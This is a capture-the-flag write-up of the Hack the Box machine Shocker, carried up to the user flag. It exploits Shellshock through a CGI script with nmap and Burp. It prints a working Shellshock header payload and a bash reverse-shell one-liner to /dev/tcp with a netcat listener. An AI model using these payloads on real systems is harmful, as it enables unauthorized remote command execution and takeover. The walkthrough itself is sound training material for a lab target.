Hack the Box – Shocker – Part 1 User Flag
# Information:
Platform Name: Hack the Box
Machine Challenge: Shocker
Machine Status: Retired
Machine Matrix:
- Enum: 5.5
- CTF: 5.1
- Custom: 3.7
- CVE: 6.3
- Real: 4.9
Challenge Level: Easy
Part 1: User Flag
# Used Tools:
- VirtualBox
- nmap
- Linux (Kali or other Distro)
- Shellshock nmap scripting.
- gobuster
- Burp
- netcat
# Challenge Description:
This challenge has no description, instead we are presented with this:
# Writeup:
Step 1
Well before anything you should probably install VirtualBox and create a virtual machine with any Linux distro. The recommended one is usually Kali Linux because it comes with all the tools already.
However, you can use any other distro you like, in my case I created a virtual machine and installed Kubuntu without any extra tools and I am now installing the tools as I need them. (Note: if you want me to create a tutorial on how to install VirtualBox and on how to create a new virtual machine on a Linux computer let me know in the comments please)
Step 2
Once you have VirtualBox and a Linux virtual machine created you can now login in it the VMVM, open a terminal, and connect to HTB VPN. To do so, first, you have to install openvpn on your Linux VM by typing:
mregra on Cyber:VM $ sudo apt update && sudo apt install openvpn -y
After openvpn is installed go to your HTB home page and on the top right corner, you should find a button “Connect to HTB”, click on it. A menu should appear from the right with the options “Machines” and “Starting Point”. For our purpose, we need the option Machines, and after clicking on it we want the option OpenVPN.
Finally, you can pick the server you prefer. I would suggest you pick the one closest to you, which should be the first one presented. Also, you can choose either UDP or TCP connection. TCP should be safer, but UDP should be faster. For this purpose does not matter much which one you choose, just pick one, I will go with UDP, and then simply click “Download VPN”.
Step 3
Now that you have openvpn installed and that you downloaded the VPN from HTB you simply have to connect to it. To do so, run the command:
mregra on Cyber:VM $ sudo openvpn <your_vpn_name>.ovpn
Note that you should first go to the folder where the ovpn file was downloaded to.
If, after running the previous command you get “Initialization Sequence Completed” or something similar, you should be good to go.
Step 4
Now, let’s go back to the HTB site, in particular: Shocker.
In this challenge, as previously said, there is no description, so all we have to do is simply Join the Machine.
We get an IP address: 10.10.10.56
We have a hint in the name of the challenge: Shocker could be because this box is vulnerable to shell shock?!? Let’s see!
Step 5
First, I created a folder for organization purposes. I will use this folder to store all information that I may gather during the recon & enumeration & information-gathering phase of the process.
With this out of the way, I jumped right into it! I decided to use nmap to search and probe open ports, I used the command:
mregra on Cyber:VM/HTB/Shocker $ nmap -sC -sV -o nmap/first_scan 10.10.10.56
The flags I used are for:
- -sC – Stands for default scripts.
- -sV – This flag will probe open ports to determine service/version info (from the manual)
- -o – This flag simply says to send the output of the nmap command to the file first_scan located in the nmap folder. Another option is -oA that outputs the nmap results in the 3 major formats.
The nmap output is:
As you can see we have 2 ports open:
- port 80, and
- port 2222.
By looking at the information in the nmap output we can see that there is information being leaked on port 2222 version, in particular the OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 version. It is a very specific version, it points to a specific distro update for this Ubuntu type, in this case, 7.2.p2 points to a xenial distro, we will find this out later.
By performing a quick google search I was able to find out that in fact, this is a xenial distro, and also that this update is from March 2017. (The link with the information can be found at the end of the post).
We could also have used the Apache version to find out the Ubuntu version of this box.
Step 6
Now that we did some enumeration and information gathering, which helped us to discover the open ports and the Ubuntu version, let’s begin with a gobuster against port 80, which seems the most promising port for now.
We use gobuster to brute force URIs (directories and files) in websites.
The command we use first is the following:
mregra on Cyber:VM/HTB/Shocker $ gobuster dir -u http://10.10.10.56 -w /usr/share/wordlist/dirb/small.txt
What this command does is, first we state that we want to put the gobuster in directory/file enumeration mode with the flag dir. Secondly, we use the flag -u to indicate the URI in question, this case is http://10.10.10.56 which is the IP of the machine. Finally, we use the flag -w to use a world list, in this case, it is the small.txt Kali Linux word list.
After running the command, this is the output:
As you can see, gobuster found a directory: /cgi-bin/ with the status code 403, which means that we have no access to that directory.
On the browser, when we try to access this directory we get 403 Forbidden, as such:
Step 7
Now that we have this information we can again use the gobuster but list the contents inside the directory /cgi-bin/
However, this time, if we simply use:
mregra on Cyber:VM/HTB/Shocker $ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlist/dirb/small.txt
We get nothing.
I decided, after some research, to use the gobuster flag -x which searches the directory for the file extensions indicated, in our case, I decided to try, sh, pl, py, txt.
Here is the full command:
mregra on Cyber:VM/HTB/Shocker $ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x sh,pl,txt,py
And the output was:
As you can see we have a file!! user.sh
After getting this information I went back to the browser and tried the URL http://10.10.10.56/cgi-bin/user.sh. Sometimes we do not have access to the directories but we can have access to the files inside the directories. And the result was…
A file was downloaded. The contents of the file:
1
2
3
4
5
Content-Type: text/plain
Just an uptime test script
03:28:42 up 1:01, 0 users, load average: 0.00, 0.02, 0.00
It seems that this is a simple script that was executed.
Step 8
Now we will try to do Shellshock. We will do so because the name of the HTB machine is Shocker and also because there is a cgi-bin script (user.sh) which usually is vulnerable to shell shock depending on the bash version.
Note: Shellshock is a bug in Bash versions 1.0.3 – 4.3 that can enable an attacker to execute bash commands, meaning remotely controlling a bash-terminal in the target machine.
There are several ways to exploit Shellshock. We will use nmap Shellshock script and Burp to crack this.
First, let’s search in google for the correct nmap shellshock script command which is:
mregra on Cyber:VM/HTB/Shocker $ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
As you can see in the image above, this web application seems to in fact be vulnerable to Shellshock.
Step 9
Now that we have some kind of confirmation that this machine is vulnerable to Shellshock, we need a way to intercept the nmap communication on Burp to analyze it and perform the attack.
To do so, all we have to do is create a new proxy listener and redirect the communication from 10.10.10.56/80 generated to nmap, into Burp. Here is how:
First: Go to Burp -> Proxy -> Options -> Proxy Listeners -> Add
Second: Now, on the “Add a new proxy listener” menu, under Bind to port you can put a random port number, like 8081, or 5555, whatever. I went for 5555:
Third: Before pressing OK, go to the tab “Request handling”. And under “Redirect to host” write the host IP, in our case: 10.10.10.56, and under “Redirect to port” write the port 80, and finally press “OK”:
One way to test if everything is set up correctly is to simply go to http://127.0.0.1:5555/cgi-bin/ with Intercept off on Burp and you should get 403 Forbidden.
Now that everything is correct, go back to Burp, set Intercept on, go back to the terminal, and run the command:
mregra on Cyber:VM/HTB/Shocker $ nmap -sV -p5555 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 127.0.0.1
Note that this script has the specified port 5555 and the host is 127.0.0.1, so now we should be able to intercept the communication on Burp.
It works! Now we can click Forward and look for shellshock requests. Below you can find the request that popped up on my Burp:
After finding the request, I went back to HTTP history to find it again and read it more carefully as well as to analyze the server response:
After finding it I send it to Repeater by right-clicking on the request and choose the option Send to Repeater.
Once in the Repeater tab of Burp I resent the request:
The shellshock seemed to have worked but by looking at the output in the terminal we get 500 Internal Server Error:
This means that the ls command was not properly executed.
On Burp we have:
So indeed, the ls command did not work. Let’s see if we can fix it!
Step 10
By comparing the request that verifies that the web server is vulnerable to shellshock with the request that sends the ls command we can see a difference:
In the requests that confirms the shellshock vulnerability, an echo; is sent before the actual command. Let’s go back to the Repeater on Burp and edit the ls request by adding the echo;
Note that I also added /bin/ to the ls command. I did so because without it I was not getting anything. And, the /bin/ls is the full path to the ls command.
The echo; was necessary to ensure that there was a blank line between the Header and the Body of the response. As you probably know, in HTTP, there must always be a blank line separating the Header from the Body.
As you can see, we now have the output from the ls command.
Another way that works, instead of the /bin/ls is by calling the bash with a specific command, an example is:
Referer: () { :;}; echo; /bin/bash -c ls
We now need a way to run commands with the nmap script used previously.
Step 11
To do so I searched in nmap for the script in my VM by typing:
mregra on Cyber:VM/HTB/Shocker $ locate nse | grep shellshock
After finding the file, I opened it wit nano and read through it. There was a line that assigned the given command input into a variable, this was the place to add the string: echo; /bin/bash -c that allows for the execution of commands.
After some tweaking and debugging I got to this:
And now it works, after running the previous command, the ls, this was the output:
Now we can get a reverse shell in the box and access to it remotely!!
Step 12
To get a reverse shell I searched online for it and I found this amazing site.
They have a cheat sheet of reverse shell scripts in different programming languages!!
I decided to give a try to the Bash version:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Before running the command anywhere we need a TCP connection on our machine to get the reverse shell.
To do that we can use Netcat, which, as you probably know simply “is a computer networking utility for reading from and writing to network connections using TCP or UDP”. Wikipedia.
The command I used was the following:
mregra on Cyber:VM/HTB/Shocker $ nc -lvp 6666
According to the netcat manual:
- -l Listen mode, for inbound connects
- -v Verbose
- -p port Specify local port for remote connects
With the connection ready, I back to Burp to use the shell script of Pentestmonkeys as such:
After clicking “Send” I got no request, but by looking at the Netcat open connection I had this:
I have a reverse shell!!!
Now let’s try to get the User flag. Well after some search on the machine I found the flag at: /home/shelly/user.txt
And the user flag is:
References:
Image source: here
Information source links:
OpenSSH version information link.
Thank you very much for reading!
Cheers,
MRegra
One Reply to “Hack the Box – Shocker – Part 1 User Flag”